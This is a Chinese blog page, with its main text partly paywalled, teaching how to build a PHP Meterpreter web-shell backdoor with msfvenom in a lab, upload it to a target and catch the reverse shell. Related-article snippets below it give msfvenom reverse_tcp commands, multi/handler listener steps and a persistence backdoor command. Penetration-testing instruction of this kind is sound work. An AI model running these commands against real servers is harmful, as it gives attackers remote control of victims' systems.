PHP Meterpreter后门

最新推荐文章于 2022-07-11 07:34:00 发布
最新推荐文章于 2022-07-11 07:34:00 发布
阅读量1.6k 收藏 1
点赞数
文章标签: php linux shell web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Admin_Shell/article/details/104470724
版权
本文介绍了如何使用Metasploit的msfvenom工具制作PHP Meterpreter后门,并详细阐述了如何将其上传到目标主机,通过设置监听模块和配置参数,最终实现反弹shell并渗透目标主机的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP Web shell。利用目标的漏洞(常见的注入和上传漏洞)之后,再把它的shell传到目标主机即可。

实验环境

系统:Kali2019
iP地址:192.168.1.15
使用工具: PHP Meterpreter

**目标主机
系统:Windows2008
iP地址:192.168.1.14

任务实施

使用Metasploit的msfvenom工具制作PHP Meterpreter**
制作PHP Meterpreter

-p:指定payload为php/meterpreter/reverse_tcp
-f:设置输出格式(raw)
LPORT:设定连接端口(默认4444)
LHOST:设定攻击主机的IP地址

完成以上操作后可使用ls查看后门文件是否生成成功
在这里插入图片描述
在通过正常途径,或者利用注入、远程文件包含漏洞等Web漏洞之后,将test2.php后门文件上传到目标服务器,接着启动msfconsole,使用以下命令设置监听。

最低0.47元/天 解锁文章
Admin_Shell
关注
获取meterpreter权限后如何留后门
黑锤的博客
09-21 2492
我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令 创建文本,并向里出入内容,并打开: echo "hello I am hacker" >>1.txt 之后再打开:notepad 1.txt即可 拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号 方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrat
Metasploit应用笔记-msfvenom生成meterpreter后门代码
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址端口。-f c 指定shellcode的c
php Meterpreter Webshell
iteye_16188的博客
11-17 427
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.phpweb服务器 3. 启动msfconsole 4. use multi/handler 5. set LHOST Attacker's_IP 6. set LPORT 443 7. set ...
Metasploit 生成各种后门
优快云
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
Meterpreter使用总结(1)
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
meterpreter后渗透之权限维持
weixin_44255856的博客
08-09 3164
Persistence后门 使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。 详细信息如下: -A 自动启动一个匹配的漏洞/多/处理程序来连接到代理 -L如果不使用%TEMP%,则选择目标主机中写入有效负载的...
Metasploit利用技巧:创建持久性后门PHP执行payload
总结起来,这个文档涵盖了Metasploit在执行后门操作中的一些关键技术,包括使用不同类型的payload、管理Meterpreter会话、执行持久性操作以及利用漏洞进行payload注入。这些技能对于渗透测试人员安全研究人员来说...
metasplot之php后门
qq_42965523的博客
04-11 443
***metasploit 之上传php后门 打开kali 输入msfvenom -p php/meterpreter/reverse_tcp lhost=内网ip地址 lhost=4455 R> shell.php 生成一个php文件木马. 新建一个终端 输入msfconsole 打开meterpreter 使用手动监听模块, 设立攻击载荷 ,设立 监听端口,设立端口为4455 ...
如何使用 msfvenom创造一个php后门
04-07
以下是使用msfvenom创建php后门的步骤: 1. 打开终端并输入以下命令: ``` msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port Number> -f raw > backdoor.php ``` 2. 替换`...
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 3174
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
apache virtualhost 访问不了_Meterpreter执行不了shell原因
weixin_35779370的博客
12-28 352
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
msf payload php,Metasploit(四)--Msfpayload命令
weixin_32304785的博客
03-11 567
msfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindowsmsfpayload-l|greplinuxmsfpayload-l|grepandriod列出某个平台的pyloadsmsfpayloadwindows/meterpreter/bind_t...
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5739
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 4195
From:https://blog.youkuaiyun.com/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
渗透之——Metasploit渗透php-utility-belt程序
冰河的专栏
01-17 1651
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86526103 攻击机 kali 192.168.109.137 靶机:Win XP 192.168.109.141 应用程序 php-utility-belt (可以到链接:https://download.youkuaiyun.com/download/l1028386804/109...
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3357
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上, Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
利用Metasploit对PHP5.2.4渗透测试提权
渗透测试
05-06 1780
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结 前言 针对PHP5.2.4进行渗透测试提权 一、启动metasploit数据库 启动metasploit在上一篇文章已经详细介绍 利用db_nmap扫描到的结果,在进行services -u 过滤结果 msf6 > services -u Services ======== host port proto name state info --
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值